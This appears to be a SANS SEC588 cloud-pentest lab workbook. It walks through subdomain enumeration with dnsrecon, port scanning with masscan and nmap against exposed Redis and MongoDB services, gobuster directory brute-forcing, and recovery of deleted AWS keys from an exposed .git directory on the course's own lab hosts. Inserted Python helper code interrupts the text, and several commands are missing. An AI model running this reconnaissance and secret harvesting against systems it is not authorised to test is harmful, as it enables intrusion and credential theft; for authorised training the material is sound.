SEC588 Workbook
THE MOST TRUSTED SOURCE FOR INFORMATION SECURITY TRAINING, CERTIFICATION, AND RESEARCH | sans.org
PLEASE READ THE TERMS AND CONDITIONS OF THIS COURSEWARE LICENSE AGREEMENT
("CLA") CAREFULLY BEFORE USING ANY OF THE COURSEWARE ASSOCIATED WITH THE SANS
COURSE. THIS IS A LEGAL AND ENFORCEABLE CONTRACT BETWEEN YOU (THE “USER”) AND
SANS INSTITUTE FOR THE COURSEWARE. YOU AGREE THAT THIS AGREEMENT IS
ENFORCEABLE LIKE ANY WRITTEN NEGOTIATED AGREEMENT SIGNED BY YOU.
With the CLA, SANS Institute hereby grants User a personal, non-exclusive license to use the Courseware
subject to the terms of this agreement. Courseware includes all printed materials, including course books
and lab workbooks, as well as any digital or other media, virtual machines, and/or data sets distributed by
SANS Institute to User for use in the SANS class associated with the Courseware. User agrees that the
CLA is the complete and exclusive statement of agreement between SANS Institute and you and that this
CLA supersedes any oral or written proposal, agreement or other communication relating to the subject
matter of this CLA.
BY ACCEPTING THIS COURSEWARE, YOU AGREE TO BE BOUND BY THE TERMS OF THIS CLA. BY
ACCEPTING THIS SOFTWARE, YOU AGREE THAT ANY BREACH OF THE TERMS OF THIS CLA MAY
CAUSE IRREPARABLE HARM AND SIGNIFICANT INJURY TO SANS INSTITUTE, AND THAT SANS
INSTITUTE MAY ENFORCE THESE PROVISIONS BY INJUNCTION (WITHOUT THE NECESSITY OF
POSTING BOND) SPECIFIC PERFORMANCE, OR OTHER EQUITABLE RELIEF.
If you do not agree, you may return the Courseware to SANS Institute for a full refund, if applicable.
User may not copy, reproduce, re-publish, distribute, display, modify or create derivative works based upon
all or any portion of the Courseware, in any medium whether printed, electronic or otherwise, for any
purpose, without the express prior written consent of SANS Institute. Additionally, User may not sell, rent,
lease, trade, or otherwise transfer the Courseware in any way, shape, or form without the express written
If any provision of this CLA is declared unenforceable in any jurisdiction, then such provision shall be
deemed to be severable from this CLA and shall not affect the remainder thereof. An amendment or
SANS acknowledges that any and all software and/or tools, graphics, images, tables, charts or graphs
presented in this Courseware are the sole property of their respective trademark/registered/copyright
owners, including:
AirDrop, AirPort, AirPort Time Capsule, Apple, Apple Remote Desktop, Apple TV, App Nap, Back to My
Mac, Boot Camp, Cocoa, FaceTime, FileVault, Finder, FireWire, FireWire logo, iCal, iChat, iLife, iMac,
iMessage, iPad, iPad Air, iPad Mini, iPhone, iPhoto, iPod, iPod classic, iPod shuffle, iPod nano, iPod touch,
iTunes, iTunes logo, iWork, Keychain, Keynote, Mac, Mac Logo, MacBook, MacBook Air, MacBook Pro,
Macintosh, Mac OS, Mac Pro, Numbers, OS X, Pages, Passbook, Retina, Safari, Siri, Spaces, Spotlight,
There’s an app for that, Time Capsule, Time Machine, Touch ID, Xcode, Xserve, App Store, and iCloud are
SOF-ELK® is a registered trademark of Lewes Technology Consulting, LLC. Used with permission.
Governing Law: This Agreement shall be governed by the laws of the State of Maryland, USA.
SEC588_W_F02_02
Licensed To: Gregg Harris <pauljones166@outlook_com> July 28, 2020
© SANS Institute 2020
Welcome to the SANS Security 588 Labs Wiki
Welcome to the SANS SEC588 Lab Wiki
This wiki will serve as your lab guide throughout the class. We will try to keep the labs accessible by allowing
(cut and paste), as well as provide color to your labs.
This lab wiki is a work in progress, and is frequently revised by the course authors. This is beneficial to all, since
you continue to get updates to lab material as we improve the quality of the exercises, correct typos, and add
new exercises.
The online wiki will always be updated, so before class ends make sure you update the wiki prior to leaving class
so you have the most recent version on your computer. The computer's local wiki will always remain.
To access the digital edition of the lab wiki from the Slingshot Linux VM, open the Firefox browser. The home
page will display this text, and allow you to navigate to the course lab exercises.
You should have been provided a Download link in your portal with Day0 Instructions. Please review those
Copy the three virtual machine files over from the USB
Once the Section 1 or Day 1 labs are completed you should be able to update the wiki by performing the
following commands:
sec588@slingshot:~$ wiki-updater.sh
That's it! With this one step you will always have the most current lab materials.
Conventions
Italic
Constant width
Used for terminal output and within paragraphs to refer to tools or other elements such as variables,
| (vertical bar)
The vertical bar is used to indicate steps necessary for navigating through menus (Edit | Paste)
Code blocks are used to denote output from tools. Content that is bold represents commands you type.
For example:
# run_this_command
output from the tool
In some cases, the commands you type will call for information that you supply (e.g., that we don't know). In
these cases, the content that you supply is noted in italics: yourinput . Replace yourinput with the information
you supply as described in the exercise.
This icon signifies a tip, suggestion, warning, or a general note.
Course and Lab Feedback
We are always excited to hear your feedback on the course materials. Is there a bug we need to squash? Do you
have a suggestion for a new awesome tool that we just have to see? Please let us know.
You can also reach out to Moses Frost directly:
Thank you!!
Update: 2020-007
If you are an ondemand student, you should be getting access to labs for the next 4 months. Check your SANS
Account for continued access.
One of the features of this class is an online wiki. You may not have found the online wiki, however, it is
recommended that you have the passwords for the wiki when you do get access.
For students in class the instructors will provide you the passwords for the wiki and for the CTF wiki.
For ondemand students you will find this in the mylabs portal.
VPN has been facilitated to ensure that you are not troubleshooting the environment at home. It is
recommended that you use the VPN provided by the SANS team for a smooth lab experience.
Use the VPN configuration found in the My Labs portal for this.
Brief Intro
Walkthrough
VMware Required
The Class VM, Slingshot, has been thoroughly tested on VMware. While we understand that some students
prefer the use of other hypervisors we do not support them in the class. If they do boot and are able to work, that
is perfectly fine, but understand that any problems in the labs you may experience may have to do with an
Please ensure you have already downloaded and installed VMware on your system.
If you have not already installed VMware, download and install it now for your platform:
You may be eligible for a free trial period of VMware Workstation Player or VMware Fusion.
We do not support the use of other virtualization products such as VirtualBox or Hyper-V in this class. You are
welcome to experiment and try to use these platforms, but we cannot support any problems that may arise.
Copy the VM Files
Find the Day0 instructions to mount your ISO into your computer. Using Windows Explorer or Finder (macOS),
copy the individual virtual machine files to your desktop or another convenient location. This will take several
minutes to complete.
Launch the Slingshot Linux VM
Launch the Slingshot Linux VM by opening VMware Workstation and using the File | Open menu to open the .ovf
that was decompressed. If VMware indicates that the virtual machine might have been copied or moved, select I
Copied It when prompted.
After the Slingshot Linux VM finishes booting, log in with the following username and password:
Username: sec588
Password: sec588
That's the last step! You can keep the Slingshot Linux VM running and continue to experiment, or shut it down
Brief Intro
The classroom labs are all available in the Amazon Cloud or in the Azure public cloud. You have been provided
with a copy of the Slingshot Virtual Machine on your USB drive. While we strive to keep the classroom
requirements to a minimum, this particular class will require that many of the tools you may use outside of class
be pre-configured or pre-setup. Here is a small list of the tools you may wish to use both in the class and outside
of class:
Amazon's AWS CLI toolkit
Microsoft's Azure CLI toolkit
Git
Eyewitness
PACU
Hydra
Kubernetes Kubelet
Inguardians Peirates
Postman
Many of these tools require python, ruby, or C dependencies to operate; we have provided a copy of the virtual
machine with the preconfigured tools. This class is designed to provide you with access to a cloud environment;
the instructions in this class will more than likely require you to type commands into a CLI environment. Many of
the tools will either be console driven or at times be based on web applications. As such getting familiarity with
studentX
This class will require you to have a 'Random Student Number'. This is noted as: StudentX where X is
replaced with a number. For all students to get your student number:
Once you have done this you can then use the following name for your labs: StudentX where the X is replaced
with the number from above. You will append a 1 to the number, for example:
You would be: Student1191 .
What if your IP is below 100? Your Student Number will start with 10 .
If your IP Address is 23.85.17.91 then your studentX will be: student1091
Make sure you note this number down.
For OnDemand Students please note:
On Demand Students will use the following nomenclature: StudentODX
Please note that we will be deleting your assets every week on Sunday night and there may be labs that need to
To use this lab we recommend visiting the Wiki getting started page (Getting-Started.html) . This will walk you
through the Virtual Machine Extraction process. We will be updating the wiki as we go through the lab.
Try It Yourself
The following are step by step instructions to extract the virtual machine and gain familiarity with the tools that
Walkthrough
Getting Familiar with the VM
Double-click the MATE Terminal and let's get familiar with the shell layout. Most of this Virtual Machine's custom
tools will be found in the /opt directory
Below is a small example of the tools that we will be looking at in this lab and get familiar with throughout the
class.
|                   <- root of the tree
/opt                <--- optional directory
|----az             <- This is the Azure CLI Tools
|----burp           <- This is the directory with the Burpsuite tools
|----eyewitness     <- This is the eyewitness directory
|----masscan        <- This is the Masscan Directory
|----postman        <- This is the Postman Directory
|----pacu           <- This is the PACU Directory
Getting familiar with Cloud SDK CLIs.
From the MATE prompt let's change into the az directory to get familiar with the Azure CLI SDK.
$ az help
The next SDK we want to get used to working with is the aws sdk. Let's ensure that it works by typing the
following:
$ aws help
You should have the help output appear.
Postman
Postman is another tool that we will use in this class, ensuring that it launches would also be a good idea.
Postman will be introduced tomorrow. Change into the /opt directory and open postman.
$ cd postman
$ ./Postman
If it opens it should show up like the screenshot below. We will be ok to close this screen as it will be used in a
different and new lab.
Throughout the week we will discuss ngrok. While we have not introduced it to you yet, we do want to get
ready for this step. In order to do so, let's register with a valid and free ngrok account.
Let us begin by working on getting us a valid ngrok key. To do this open Firefox:
Navigate to www.ngrok.com . This will provide you with a page to sign up with a valid ngrok account; click
SIGN UP
Once you are logged in, you can now copy the authtoken in step 3.
The next part will be to add the authtoken and test it. To do this you will need to open a terminal
If this worked correctly you should see a screenshot somewhat similar to below:
The URL is random for every student. Let's see how we can use this as a webserver
$ cd /tmp
$ python -m 'SimpleHTTPServer' 9999
http://<random-ngrok-hostname>.ngrok.io
The attack we are going to execute will look like the diagram below, and yes, it is a circular-like attack:
Replay of this lab
This lab is the beginning point for us to nd and obtain access into our environments. This lab will also ensure
that we have a solid working system that we can use both inside the classroom and potentially outside the
classroom. If needed you can shutdown this image and take a snapshot with the image turned off. This will help
you restore to a pristine day 1 image if needed.
In day 1 we will have a mission to provide context on the importance of reconnaissance at scale. This Wiki needs to
be updated, and you need to discover both the keys to the Wiki as well as the location of our actual labs. We have
decided to make this particular lab a treasure hunt to be able to show you how discovery at scale is meant to
work. This lab will showcase the ability to discover the associated domains that are potentially available to an
environment and then use a custom wordlist to brute-force the discovery of our lab targets. In a later lab we will
find additional items that we may be able to use to gain wiki access.
Requirements for This Lab
Please note that SANS understands that some folks will have challenges with their ISP and running scans, for
example this wordlist scan. Even at times when we attempt to hardset your settings in DNS you may find that
scans are not running correctly. As such we are going to attempt to provide workarounds in class. You may find
that you may have to run a VPN connection in order to perform scans.
In this lab we will be requiring the SEC588 Virtual Machine to be extracted. It is also going to require internet
connectivity. You will need to be able to load crt.sh (http://crt.sh) . In addition we will be using a wordlist found in
the /home/sec588/files/wordlist directory. You will need to create a file in this directory for hosts.
You will also be using a tool called dnsrecon.py that will be the tool to help you discover and enumerate hosts.
This is the final lab of your on-vm wiki! We need to accomplish and finish the Day 1 labs to get full access to our wiki
from here on out.
Try It Yourself
This lab requires you to use crt.sh to find all the subdomains in the crt.sh (http://crt.sh) website.
There is a tool called dnsrecon.py that will be able to parse the crt.sh for you and provide you with a list of
subdomains. You can find this tool in
$ /opt/dnsrecon
Place all of the hosts that are found in the output of dnsrecon.py into a file called
/home/sec588/files/workdir/urls.txt . You can do this with your favorite editor. If you're not familiar with
Linux then run the following command:
$ gedit /home/sec588/files/workdir/urls.txt
Place the entries into this file and save it then close gedit.
Hint: You may want to start with the type of -t crt .
Walkthrough
Gathering subdomains
$ less /home/sec588/files/wordlists/subdomains.txt
$ wc -l /home/sec588/files/wordlists/subdomains.txt
This is a fairly lengthy list as we can see over 70,000 entries. We will discuss the creation of this wordlist on Day
2. If we attempt to work through this particular list our lab would take over 1 hour! We have shortened this list for
you with the following command:
head -5000 /home/sec588/files/wordlists/subdomains.txt > /home/sec588/files/wordlists/subdomains-5k.txt
Now that we are armed with a wordlist let's attempt to try and figure out which one of our domains we will be
Run dnsrecon with the following command line arguments:
$ cd /opt/dnsrecon
Note that you will see [+] 0 Records Found but will have a list of "Subdomains". With these subdomains you can
take EACH one to find the subdomain for you to use with class.
-d specify a domain, in this case sec588.net
-t specify a type of dnsrecon to run; in our case let's check for crt.sh
This should output several discovered subdomains. The class set of wordlists will be growing every class run so
do not be surprised with a very large list.
You may have to bruteforce the first few subdomains to find the one for class, it may be the newest one but it
could also be a few more down. Just keep this in mind as we work through this particular lab. At the time of
writing it was our latest entry which was but in your class it will be different.
Figuring out which domain is truly yours
How to tell you have the right domain? We have hidden the class identifier in a TXT record. For example,
ondemand students can perform the following commands to see if they have the right domain:
#!/bin/bash
nslookup
> <class-subdomain>.sec588.net
Alternatively, we included an 'Automated Way' to check to make sure that you have found the appropriate
subdomain:
Step 1: Run the command and output the results to a text file:
$ ./dnsrecon.py --iw -d sec588.net -t crt > ~/files/workdir/dnsrecon-output.txt
Step 2: Run a command to trim down the ‘output.txt’ file to only have the sub-domains and output to a new file,
‘list.txt’
Step 3: Run this bash shell one-liner to use ‘dig’ to look for the special TXT record to find valid domains
$ for i in $(cat ~/files/workdir/cutlist.txt); do echo "[+] Querying $i"; dig -t txt +short $i; done
If the answer is:
<class-subdomain>.sec588.net text = "ondemand"
You have located the correct subdomain!
If you wish to save this as an environment variable this may help you with labs! export CLASS_SUBDOMAIN=<class-subdomain>
Save this in bash for reboots:
echo 'export CLASS_SUBDOMAIN=<class-subdomain>' >> /home/sec588/.bashrc
We will now run the following command to be able to dive into that subdomain and scrape out the individual
hosts. If these commands do not work look for the output file example below.
/home/sec588/files/workdir/dnsrecon.csv
What do our new commands do?
-t brt,crt use the following modes of operation: brt is used to instruct the system to brute force a wordlist,
and crt also uses the crt.sh scan
--threads increase the number of threads from 1 to, in our example, 10
We now see that we have found the following URLs, remember YOUR subdomains will be different as they are in
every class:
www.<class-subdomain>.sec588.net
wiki.<class-subdomain>.sec588.net
blog.<class-subdomain>.sec588.net
dev.<class-subdomain>.sec588.net
An example has been provided in our online wiki (http://wiki.<class-subdomain>.sec588.net/files/lab12-dnsrecon-output.txt)
Please make a note of these hostnames; we will be referring to these hosts throughout the class. You can use any
notepad application you are comfortable with. If you are not sure which one you can use either gedit or
nano.
nano /home/sec588/files/workdir/urls.txt
Conclusion
In this lab, we have discovered how to enumerate hosts with dnsrecon.py; we could also use alternative tools like
gobuster but we will be using this tool in another lab.
The next few labs will be available in print and on our online wiki!
http://wiki.<class-subdomain>.sec588.net
For the next lab we will be using the online wiki so that we can fix our class wiki
Often times as attackers we may want to discover subdomains and hosts within those domains but we may run
into several issues. These could include false positives, shunning, or other false negatives. We need to
understand how we can use tools, weed out the false positives and attempt to determine if there is an
opportunity for an attacker to uncover our sites.
Bonus (If Time Permits or Homework)
As an additional lab if you wish to find out about how subdomain enumeration works you may try and use the
following gobuster commands:
/home/sec588/files/wordlists/subdomains-5k.txt
This is an additional resource we will use in another lab for other types of enumeration.
Additional Resources
Check out SANS SEC542 for additional resources on how to do web enumeration (https://www.sans.org/course/web-app-penetration-testing-ethical-hacking).
Portscans at scale can be very critical for discovery of new servers, and more importantly services, that may be
littered across many cloud environments across the internet. This lab will attempt to uncover what exposed
ports and by relation what default configurations we can find in our cloud environment. This lab will show us the
strengths and the limitations of each of our tools. We will also display the methodology that we can employ in
each one of the tools to gather more and more information from our cloud environments.
Recall that we are using the information from our previous lab to generate the target list for this lab. Example:
dnsrecon -> provides hostnames with IPs -> feeding into -> masscan and then -> nmap .
Requirements for This Lab
In this lab we will be requiring the SEC588 Virtual Machine to be extracted. It is also going to require internet
connectivity.
This lab will be hosted and found on:
http://wiki.<class-subdomain>.sec588.net
Try It Yourself
To attempt this class without hints the following methodology should be followed:
1. Look at the results from our dnsrecon.py script and locate all the A records that have just an IP address.
/home/sec588/files/workdir/ips.txt
3. Run the masscan command with --top-ports
4. Run the masscan command with a list of ports such that the following ports are included: 20-25,79-80,8000-9000,6739,1433,1434,5432,3306,27017
5. Follow this up by running nmap with the found ports running a script scan.
6. Attempt to run the script scan with additional tools that match the ports that were found.
7. Save the results in an output directory to be looked at with a visual editor.
Walkthrough
While nmap does a fairly good job of helping automate and locate hosts on a large network, masscan acts a little
differently. It does not do DNS resolution as an example. Due to the targeting that we must have in our lab we
will be providing masscan a very simple set of hosts to scan. To do this, we will look back at our previous lab. Let's
gather some hosts to scan.
$ cd /opt/dnsrecon
$ ./dnsrecon.py --iw -d <class-subdomain>.sec588.net -D /home/sec588/files/wordlists/subdomains-5k.txt -t brt,crt --threads 10 -c /home/sec588/files/workdir/dnsrecon.csv
Now let's create a list of IP addresses based on these CSV entries. We will provide you with two options to do this;
either one will work, and the choice is based on preference.
$ gedit /home/sec588/files/workdir/ips.txt
We will reference this file in both nmap and masscan using the -iL keyword.
Option 2: Use the following awk statement to manually create the file:
What we have done here is taken our list of known IP addresses that we found through DNS reconnaissance and
started to scan them. Some of these will be generic AWS services that will yield no value, if you can identify those
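The same extraction done in Python, as an added example that is not part of the course materials: it reads the CSV that dnsrecon writes with -c (assumed column layout Type,Name,Address,Target,Port,String), keeps the unique addresses from A records for ips.txt, the resolved hostnames for urls.txt, and the names carrying the class TXT marker. The sample rows, the classx subdomain and the 203.0.113.x / 2001:db8:: addresses are constructed placeholders, not lab values. Filtering on record type matters because brt,crt output also contains CNAME and TXT rows whose Address column is empty.

```python
"""Build ips.txt / urls.txt content from a dnsrecon CSV (added example, not course code).

Assumed input: dnsrecon's "-c" CSV with the header
Type,Name,Address,Target,Port,String. Sample data below is constructed.
"""
import csv
import io
import ipaddress

# Constructed sample of a brt,crt run; "classx" stands in for <class-subdomain>.
SAMPLE_CSV = """Type,Name,Address,Target,Port,String
A,www.classx.sec588.net,203.0.113.10,,,
A,wiki.classx.sec588.net,203.0.113.11,,,
CNAME,blog.classx.sec588.net,,d1234.cloudfront.net,,
A,dev.classx.sec588.net,203.0.113.12,,,
A,www.classx.sec588.net,203.0.113.10,,,
TXT,classx.sec588.net,,,,ondemand
AAAA,www.classx.sec588.net,2001:db8::10,,,
"""


def parse_dnsrecon_csv(text):
    """Return one dict per CSV row, keyed by the header names."""
    return list(csv.DictReader(io.StringIO(text)))


def collect_ips(rows, want_v6=False):
    """Unique, sorted addresses from A (and optionally AAAA) records.

    This is the ips.txt that masscan and nmap consume through -iL.
    Malformed addresses are dropped rather than passed to a scanner.
    """
    types = {"A"} | ({"AAAA"} if want_v6 else set())
    found = set()
    for row in rows:
        if row["Type"] in types and row["Address"]:
            try:
                found.add(ipaddress.ip_address(row["Address"]))
            except ValueError:
                continue
    # IPv4 first, then IPv6, each in numeric order
    return [str(ip) for ip in sorted(found, key=lambda ip: (ip.version, ip.packed))]


def collect_hostnames(rows):
    """Unique resolved hostnames (A/AAAA/CNAME rows), normalised, for urls.txt."""
    names = {row["Name"].lower().rstrip(".") for row in rows
             if row["Type"] in ("A", "AAAA", "CNAME") and row["Name"]}
    return sorted(names)


def txt_marker(rows, expected="ondemand"):
    """Names whose TXT record equals the class marker the lab hides in DNS."""
    return sorted(row["Name"] for row in rows
                  if row["Type"] == "TXT" and row["String"].strip() == expected)


if __name__ == "__main__":
    rows = parse_dnsrecon_csv(SAMPLE_CSV)
    print("\n".join(collect_ips(rows)))        # what you would write to ips.txt
    print("\n".join(collect_hostnames(rows)))  # what you would write to urls.txt
    print(txt_marker(rows))
```

Run against a real file with `rows = parse_dnsrecon_csv(open(path).read())`; duplicates collapse because the wordlist and crt.sh passes often return the same name twice.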
Masscan
We will start our widescale scan with Masscan. We will do this as it is designed to identify the live hosts and their
listening ports quickly. Masscan does have some limitations to how it operates. It is designed to:
We will be using some of these features specifically to find what ports are open across our clouds. Let's start by
scanning our ip addresses and seeing what default ports masscan finds:
$ cd /opt/masscan
$ sudo ./masscan -iL /home/sec588/files/workdir/ips.txt -p1-1024
This should scan the first 1024 ports on a host. Let's take a look at what we discover.
Just to review what this does:
-iL This specifies a file as input
-p
Masscan in this example will discover a few ports on this host. This particular host has port 80 and 22 open. This
scan is almost the same as our --top-ports feature in masscan as --top-ports is only ports 1-1000. Let's expand
this to include 5,000 ports. The command below is 4 zeros.
An example of the output has been provided in our online wiki (http://wiki.<class-subdomain>.sec588.net/files/lab13-
If this command below takes a long time, such as 5 minutes, press CTRL-C to abort
An example of the output has been provided in our online wiki (http://wiki.<class-subdomain>.sec588.net/files/lab13-masscan-ips3.txt) or the local wiki (http://localhost/wiki/files/lab13-masscan-ips3.txt)
$ sudo ./masscan -iL /home/sec588/files/workdir/ips.txt -p20-80,443,445,1433,3306,6379,5432,27017
We now see several ports open that are interesting. Let's follow this up by a very thorough and narrow nmap
scan including specific nse scripts:
An example of the output has been provided in our online wiki (http://wiki.<class-subdomain>.sec588.net/files/lab13-
/home/sec588/files/workdir/scan1
-iL
-p
-oA
This enables saving the output with the filename of scan1 and will include nmap format, grep format,
and xml format.
What you will notice is that this command will fill up the entire terminal window
This scan scrolls off the screen so let's open our scan1.nmap file in gedit.
$ gedit /home/sec588/files/workdir/scan1.nmap
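The hand-off from masscan to the narrow nmap scan, as an added example that is not part of the course materials: it parses masscan's hit lines (the "Discovered open port 80/tcp on 203.0.113.10" lines it prints, and the "open tcp 80 203.0.113.10 <timestamp>" shape that -oL writes), collapses duplicates, compresses each host's ports into nmap -p syntax, and builds one nmap argument vector per host with the -sV/-O/--traceroute/--script/-oA options this lab uses. Nothing is executed; the sample lines and 203.0.113.x addresses are constructed placeholders, and the per-host output filename is my own convention. Scanning only the ports masscan actually saw is what keeps the follow-up scan narrow, and the same triage applies when a defender reviews an exposure scan of their own cloud ranges.

```python
"""Turn masscan hits into per-host nmap follow-up commands (added example, not course code).

Assumed input shapes: masscan stdout lines ("Discovered open port P/tcp on IP")
and -oL lines ("open tcp P IP TIMESTAMP"). Sample data is constructed.
"""
import re
import shlex
from collections import defaultdict

# Constructed sample mixing both line shapes, a banner line and a duplicate hit.
SAMPLE_MASSCAN = """\
Starting masscan at 2020-07-28 12:00:00 GMT (constructed noise line)
Discovered open port 22/tcp on 203.0.113.10
Discovered open port 80/tcp on 203.0.113.10
Discovered open port 6379/tcp on 203.0.113.11
open tcp 27017 203.0.113.11 1595937600
Discovered open port 80/tcp on 203.0.113.10
"""

STDOUT_RE = re.compile(r"^Discovered open port (\d+)/(tcp|udp) on (\S+)")
LIST_RE = re.compile(r"^open (tcp|udp) (\d+) (\S+)")


def parse_masscan(text):
    """Map each host to its sorted list of open TCP ports; duplicates collapse."""
    hosts = defaultdict(set)
    for line in text.splitlines():
        m = STDOUT_RE.match(line)
        if m:
            port, proto, ip = int(m.group(1)), m.group(2), m.group(3)
        else:
            m = LIST_RE.match(line)
            if not m:
                continue  # banners, rate lines and blanks are ignored
            proto, port, ip = m.group(1), int(m.group(2)), m.group(3)
        if proto == "tcp":
            hosts[ip].add(port)
    return {ip: sorted(ports) for ip, ports in hosts.items()}


def port_spec(ports):
    """Compress a sorted port list into nmap -p syntax: [22, 80, 81, 82] -> '22,80-82'."""
    spec, start, prev = [], None, None
    for p in ports:
        if start is None:
            start = prev = p
        elif p == prev + 1:
            prev = p
        else:
            spec.append(f"{start}-{prev}" if prev > start else str(start))
            start = prev = p
    if start is not None:
        spec.append(f"{start}-{prev}" if prev > start else str(start))
    return ",".join(spec)


def nmap_followup(hosts, outdir="/home/sec588/files/workdir", scripts=("redis*", "mongo*")):
    """One nmap argv per host, limited to the ports masscan reported.

    Output basename scan-<ip> (my convention) goes to -oA so the .nmap, .gnmap
    and .xml files land in the lab's workdir. Returns a list of argv lists.
    """
    cmds = []
    for ip, ports in sorted(hosts.items()):
        if not ports:
            continue
        cmds.append(["sudo", "nmap", "-sV", "-O", "--traceroute",
                     "--script=" + ",".join(scripts),
                     "-p", port_spec(ports), "-oA", f"{outdir}/scan-{ip}", ip])
    return cmds


def as_shell(cmds):
    """Render the argv lists as shell lines (quoted, so the script globs survive)."""
    return "\n".join(shlex.join(c) for c in cmds)


if __name__ == "__main__":
    print(as_shell(nmap_followup(parse_masscan(SAMPLE_MASSCAN))))
```

Feed it a saved masscan run with `parse_masscan(open(path).read())`; review the printed commands before running them, since a host that only answered on a CDN or load-balancer port is the "generic AWS service" the text says yields no value.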
1. A Redis database is found but none of the script scans fired for it
2. A MongoDB database was found and there are databases that are enumerable in the scan results.
While this scan is valuable in its default state it does not check the redis database that you may have noticed
was found in this environment. Let's enable some redis and mongodb checks.
An example of the output has been provided in our online wiki (http://wiki.<class-subdomain>.sec588.net/files/lab13-nmap-scan1.txt) or the local wiki (http://localhost/wiki/files/lab13-nmap-scan1.txt)
The command above changes the script function so that we can modify the script scans but have the other
options enabled:
What is our new command option?
--script=redis*,mongo* Script scan for any NSE script files that begin with mongo or redis
-O OS Fingerprint Scan
-sV Version Scan
--traceroute Enable traceroute on the scan
$ gedit /home/sec588/files/workdir/scan2.nmap
We now see that we have both an Enumerable MongoDB and an Enumerable Redis scan.
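Added example (not code from the workbook): a small Python parser for the greppable scan1.gnmap file that -oA writes alongside the .nmap and .xml output. It picks out the open ports per host and flags datastore ports such as redis (6379) and mongodb (27017), so the follow-up --script=redis*,mongo* scan can be aimed at exactly those hosts. The sample lines, hosts and version strings are constructed placeholders.

```python
"""Parse nmap greppable output (the scan1.gnmap file that -oA writes) and flag
datastore ports. Added example, not code from the SEC588 workbook; the sample
lines, hosts and version strings below are constructed placeholders."""
import re

# Constructed sample in .gnmap format; each Ports entry is
# port/state/proto/owner/service/rpcinfo/version/ separated by ", ".
SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated as: nmap -sV -iL hosts.txt -oA scan1
Host: 192.0.2.10 ()\tStatus: Up
Host: 192.0.2.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.6p1/, 80/open/tcp//http//nginx/\tIgnored State: closed (998)
Host: 192.0.2.11 ()\tStatus: Up
Host: 192.0.2.11 ()\tPorts: 6379/open/tcp//redis//Redis key-value store 5.0.7/, 27017/open/tcp//mongodb//MongoDB 4.0.10/, 8080/filtered/tcp//http-proxy///\tIgnored State: closed (997)
# Nmap done -- 2 IP addresses (2 hosts up) scanned
"""

# Ports that should not be reachable from an untrusted network without authentication.
DATASTORE_PORTS = {6379: "redis", 27017: "mongodb", 27018: "mongodb", 11211: "memcached"}

_PORTS_LINE = re.compile(r"^Host: (\S+) \(([^)]*)\)\tPorts: (.*?)(?:\t|$)")


def parse_gnmap(text):
    """Return {host: [(port, proto, service, version), ...]} for open ports only."""
    results = {}
    for line in text.splitlines():
        m = _PORTS_LINE.match(line)
        if not m:
            continue  # comments and Status-only lines carry no port data
        host, _hostname, ports_field = m.groups()
        open_ports = []
        for entry in ports_field.split(", "):
            fields = entry.split("/")
            if len(fields) < 7:
                continue
            port, state, proto, _owner, service, _rpc, version = fields[:7]
            if state == "open":
                open_ports.append((int(port), proto, service, version))
        results[host] = open_ports
    return results


def exposed_datastores(parsed):
    """Sorted (host, port, label) for every open port listed in DATASTORE_PORTS."""
    return sorted((host, port, DATASTORE_PORTS[port])
                  for host, entries in parsed.items()
                  for port, _proto, _service, _version in entries
                  if port in DATASTORE_PORTS)


if __name__ == "__main__":
    for host, port, label in exposed_datastores(parse_gnmap(SAMPLE_GNMAP)):
        print(f"{host}:{port} ({label}) is open; follow up with --script={label}*")
```

Filtered ports are dropped on purpose: the point of the second scan is to run the database NSE scripts only against services that actually answered.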
This lab displays the use of nmap and masscan in conjunction, but more importantly, it shows how you can

Conclusion

In this lab we explored using masscan and using nmap. While we didn't do an internet-wide scan, import a large subnet block, or make use of all of masscan's features, we did provide a workflow that is actionable in a real-world scenario. Masscan can be used in conjunction with nmap to provide a consistent, accurate workflow that will allow us to discover hosts.
Brief Intro

Developers will use source code repository tools to save their work and collaborate with other developers. Sometimes these developers will accidentally commit secrets into their code repositories, and they will then attempt to remove those items, or secrets, by just deleting the files that they committed. This is not sufficient to remove the files completely from the repository. As such, an attacker that finds the repository can pull the files back and use the key material.

Requirements for This Lab

In this lab we will be requiring connectivity to our lab environment. Connectivity to the 'dev' server will be required.

Try It Yourself

One of the servers that is in our list of hosts may have an exposed file that could provide us with some level of authentication.

1. Enumerate all of the common subdirectories across the hosts.

Walkthrough

Getting started

As we are doing reconnaissance let's try and get several tools together to attempt to pull down this exposed .git directory.
The first step would be to use gobuster. Gobuster can be run in 'dir' mode which will allow us to brute force directories.

This presents us with our first problem: what are common SCM directories and sensitive files?

One possible option would have been to open scan1.nmap and look at the top of the text file. Run the following command:

$ less /home/sec588/files/workdir/scan1.nmap

| http-git:
|   <ip>:80/.git/

$ cat /home/sec588/files/wordlists/scm.txt
This file just contains a small list of entries. Let's now look at our potential hosts:

$ cat /home/sec588/files/workdir/dnsrecon.csv | awk -F, '{ print tolower($2) }' | sort -u | grep -v name | grep -v amazonaws > /home/sec588/files/workdir/urls.txt

This is a very long string, but let's break down what is happening here.

2. We use awk to separate each area by comma (,) and then we print all the characters lowercase, picking JUST the second area, which will be our URLs.
4. Finally we send this list through grep -v twice to remove two entries: the name and amazonaws entries.
5. All of this is sent to /home/sec588/files/workdir/urls.txt.
... /home/sec588/files/wordlists/scm.txt -o /home/sec588/files/workdir/scm-$URL.txt; done

This particular script that we see has a few items to take note of, so let's look through this:

1. We have a for loop in which we are placing into the URL variable whatever is contained in our txt file of URLs.
2. The next section after the do is our gobuster command, in which:
   - we use dir (for directory bruteforcing)
   - we use -u passing in whatever item in $URL we are working with now
   - we are outputting with -o and adding to the end of the filename the $URL we are working on
3. We end any loop with done.

Once this completes we can see if any files contain any content:

$ ls -la /home/sec588/files/workdir

$ cat /home/sec588/files/workdir/scm-dev.<class-subdomain>.sec588.net.txt

This should reveal that it has a .git directory. Let's go retrieve it.
$ cd /home/sec588/files/workdir
$ cd lab14
$ wget --mirror -I .git http://dev.<class-subdomain>.sec588.net/.git/

Now that we have the git directory let's look through it:

$ cd dev.<class-subdomain>.sec588.net
$ git log

The git log will show you a single commit. This commit may be of interest, considering that the comments have the words: "Opps, committed the key".

"Opps" is spelled wrong as well. Unsure what the author may have been thinking when he did that.

Let's review that commit. To do this you need to copy the hash value that is shown next to the word "commit".

If we have correctly put in the command at the bottom you will see two entries, more than likely colored in red with a - in front of them.

-AWS_KEY=
-AWS_SECRET_KEY=
Conclusion

